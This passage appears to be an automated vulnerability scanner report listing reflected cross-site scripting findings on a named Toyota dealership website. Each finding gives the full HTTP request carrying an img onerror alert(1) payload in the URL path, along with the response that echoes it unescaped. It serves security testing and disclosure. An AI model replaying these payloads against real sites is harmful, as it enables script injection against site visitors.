Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:25:56 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:25:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:25:57 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x2e1 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tacoma 4x2e16e5"><img src=a onerror=alert(1)>13e7f5069df at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tacoma 4x2e16e5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 569ac'><img%20src%3da%20onerror%3dalert(1)>dc11837832f was submitted in the REST URL parameter 2. This input was echoed as 569ac'><img src=a onerror=alert(1)>dc11837832f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x2569ac'><img%20src%3da%20onerror%3dalert(1)>dc11837832f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:28:43 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:28:43 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:28:44 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x256 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tacoma 4x2569ac'><img src=a onerror=alert(1)>dc11837832f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88460'><img%20src%3da%20onerror%3dalert(1)>5d2282c1747 was submitted in the REST URL parameter 2. This input was echoed as 88460'><img src=a onerror=alert(1)>5d2282c1747 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x488460'><img%20src%3da%20onerror%3dalert(1)>5d2282c1747/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:54:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:54:52 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:54:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x488 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tacoma 4x488460'><img src=a onerror=alert(1)>5d2282c1747'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b639e<img%20src%3da%20onerror%3dalert(1)>6472c642e7e was submitted in the REST URL parameter 2. This input was echoed as b639e<img src=a onerror=alert(1)>6472c642e7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x4b639e<img%20src%3da%20onerror%3dalert(1)>6472c642e7e/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:56:36 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:56:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x4b6 ...[SNIP]... <H1> Toyota Tacoma 4x4b639e<img src=a onerror=alert(1)>6472c642e7e</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a1ef"><img%20src%3da%20onerror%3dalert(1)>de1c249dee was submitted in the REST URL parameter 2. This input was echoed as 2a1ef"><img src=a onerror=alert(1)>de1c249dee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x42a1ef"><img%20src%3da%20onerror%3dalert(1)>de1c249dee/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:53:34 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:34 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:53:35 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x42a ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tacoma 4x42a1ef"><img src=a onerror=alert(1)>de1c249dee at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tacoma 4x42a1ef"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8937<img%20src%3da%20onerror%3dalert(1)>28d3df7f68d was submitted in the REST URL parameter 2. This input was echoed as f8937<img src=a onerror=alert(1)>28d3df7f68d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%20PreRunnerf8937<img%20src%3da%20onerror%3dalert(1)>28d3df7f68d/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:53:38 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:39 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:53:39 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma PreRu ...[SNIP]... <H1> Toyota Tacoma PreRunnerf8937<img src=a onerror=alert(1)>28d3df7f68d</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326bf"><img%20src%3da%20onerror%3dalert(1)>3c3aeef81d8 was submitted in the REST URL parameter 2. This input was echoed as 326bf"><img src=a onerror=alert(1)>3c3aeef81d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%20PreRunner326bf"><img%20src%3da%20onerror%3dalert(1)>3c3aeef81d8/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:49:14 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:49:14 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:49:15 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma PreRu ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tacoma PreRunner326bf"><img src=a onerror=alert(1)>3c3aeef81d8 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tacoma PreRunner326bf"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e9fe'><img%20src%3da%20onerror%3dalert(1)>89baf3c09f was submitted in the REST URL parameter 2. This input was echoed as 7e9fe'><img src=a onerror=alert(1)>89baf3c09f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%20PreRunner7e9fe'><img%20src%3da%20onerror%3dalert(1)>89baf3c09f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:51:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:51:37 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:51:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma PreRu ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tacoma PreRunner7e9fe'><img src=a onerror=alert(1)>89baf3c09f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8213c'><img%20src%3da%20onerror%3dalert(1)>01244b878b2 was submitted in the REST URL parameter 2. This input was echoed as 8213c'><img src=a onerror=alert(1)>01244b878b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x28213c'><img%20src%3da%20onerror%3dalert(1)>01244b878b2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:38:19 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:38:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:38:20 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Crew Max 4x28213c'><img src=a onerror=alert(1)>01244b878b2'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94ee5<img%20src%3da%20onerror%3dalert(1)>6742f235aaf was submitted in the REST URL parameter 2. This input was echoed as 94ee5<img src=a onerror=alert(1)>6742f235aaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x294ee5<img%20src%3da%20onerror%3dalert(1)>6742f235aaf/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:23 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:24 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:24 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <H1> Toyota Tundra Crew Max 4x294ee5<img src=a onerror=alert(1)>6742f235aaf</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312f1"><img%20src%3da%20onerror%3dalert(1)>e6759eebc0a was submitted in the REST URL parameter 2. This input was echoed as 312f1"><img src=a onerror=alert(1)>e6759eebc0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x2312f1"><img%20src%3da%20onerror%3dalert(1)>e6759eebc0a/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:02 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:02 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:03 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Crew Max 4x2312f1"><img src=a onerror=alert(1)>e6759eebc0a at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Crew Max 4x2312f1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 733e9'><img%20src%3da%20onerror%3dalert(1)>89d25a92153 was submitted in the REST URL parameter 2. This input was echoed as 733e9'><img src=a onerror=alert(1)>89d25a92153 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x4733e9'><img%20src%3da%20onerror%3dalert(1)>89d25a92153/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:57:37 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:57:37 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:57:38 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Crew Max 4x4733e9'><img src=a onerror=alert(1)>89d25a92153'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2dc"><img%20src%3da%20onerror%3dalert(1)>74497de5b9f was submitted in the REST URL parameter 2. This input was echoed as 4a2dc"><img src=a onerror=alert(1)>74497de5b9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x44a2dc"><img%20src%3da%20onerror%3dalert(1)>74497de5b9f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:55:38 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:55:38 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:55:39 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Crew Max 4x44a2dc"><img src=a onerror=alert(1)>74497de5b9f at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Crew Max 4x44a2dc"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3b83<img%20src%3da%20onerror%3dalert(1)>dfacfece2c2 was submitted in the REST URL parameter 2. This input was echoed as b3b83<img src=a onerror=alert(1)>dfacfece2c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x4b3b83<img%20src%3da%20onerror%3dalert(1)>dfacfece2c2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:59:16 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:59:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:59:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <H1> Toyota Tundra Crew Max 4x4b3b83<img src=a onerror=alert(1)>dfacfece2c2</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86b5b'><img%20src%3da%20onerror%3dalert(1)>1329f066d0b was submitted in the REST URL parameter 2. This input was echoed as 86b5b'><img src=a onerror=alert(1)>1329f066d0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x286b5b'><img%20src%3da%20onerror%3dalert(1)>1329f066d0b/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
